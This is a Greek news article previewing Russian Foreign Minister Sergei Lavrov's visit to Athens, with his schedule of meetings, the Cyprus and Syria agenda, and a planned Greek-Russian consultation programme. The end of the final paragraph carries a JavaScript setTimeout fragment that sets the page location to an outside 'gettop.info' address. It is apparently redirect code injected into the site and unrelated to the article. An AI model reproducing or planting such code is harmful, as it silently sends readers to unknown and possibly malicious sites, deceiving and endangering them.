Διμερείς σχέσεις, Κυπριακό και Μεσανατολικό στις επαφές Λαβρόφ

0
4

 

Η πορεία των διμερών σχέσεων στους τομείς της πολιτικής συνεργασίας, της οικονομίας, της ενέργειας και των επενδύσεων, οι εξελίξεις στην Ανατολική Μεσόγειο και τη Μέση Ανατολή, με έμφαση στο Κυπριακό και τη Συρία,είναι στην ατζέντα του υπουργού Εξωτερικών της Ρωσίας Σεργκέι Λαβρόφ κατά την επίσκεψή του στην Αθήνα. ως ανταποδοτική αυτής του Έλληνα ομολόγου του Νίκου Κοτζιά στη Μόσχα.

Κατά τη συνάντηση Κοτζιά-Λαβρόφ ιδιαίτερη έμφαση αναμένεται ότι θα δοθεί στις εξελίξεις στο Κυπριακό, καθώς ο Έλληνας υπουργός Εξωτερικών θα αναπτύξει τις θέσεις της Ελλάδας σε σχέση με την ανάγκη κατάργησης των εγγυήσεων και απομάκρυνσης των τουρκικών στρατευμάτων από την Κύπρο.

Οι επαφές του θα ξεκινήσουν με τον Πρόεδρο της Δημοκρατίας, στις 10 το πρωί στο Προεδρικό Μέγαρο. Θα ακολουθήσει η συνάντησή του με τον πρωθυπουργό Αλέξη Τσίπρα στις 10.45 στο Μέγαρο Μαξίμου.

Αμέσως μετά, συνοδευόμενος από τον Έλληνα ομόλογό του Νίκο Κοτζιά, θα απευθύνει χαιρετισμό στο 4ο Ελληνορωσικό Κοινωνικό Forum στο Ζάππειο Μέγαρο (11.15) και στη συνέχεια (11.45) θα παραστεί στα εγκαίνια της έκθεσης «Ερμιτάζ. Πύλη στην Ιστορία» στο Βυζαντινό και Χριστιανικό Μουσείο.

Λίγο πριν από τις 12.30 οι δύο υπουργοί αναμένεται ότι θα βρίσκονται στο υπουργείο Εξωτερικών όπου μετά τις κατ’ ιδίαν συνομιλίες θα συνυπογράψουν το Πρόγραμμα Διαβουλεύσεων των Υπουργείων Εξωτερικών Ελλάδας- Ρωσίας για την τριετία 2017-2019 και θα δώσουν κοινή συνέντευξη Τύπου. Η επίσκεψη του επικεφαλής της ρωσικής διπλωματίας στην Αθήνα θα ολοκληρωθεί το απόγευμα, με την αναγόρευσή του σε Επίτιμο Διδάκτορα του Πανεπιστημίου Πειραιά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here